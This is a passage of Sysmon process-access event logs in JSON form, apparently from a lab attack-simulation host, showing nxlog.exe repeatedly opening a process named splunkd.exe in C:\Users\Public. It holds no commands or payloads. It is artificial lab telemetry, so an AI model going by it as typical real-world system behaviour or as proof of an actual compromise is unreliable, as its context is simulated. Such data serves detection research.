(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:29.463","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4250,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:30.464\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:30.464","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4251,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:31.465\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:31.465","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4252,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:32.465\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:32.465","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4253,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:33.466\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:33.466","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4254,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:34.467\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:34.467","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4255,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:35.468\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:35.468","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
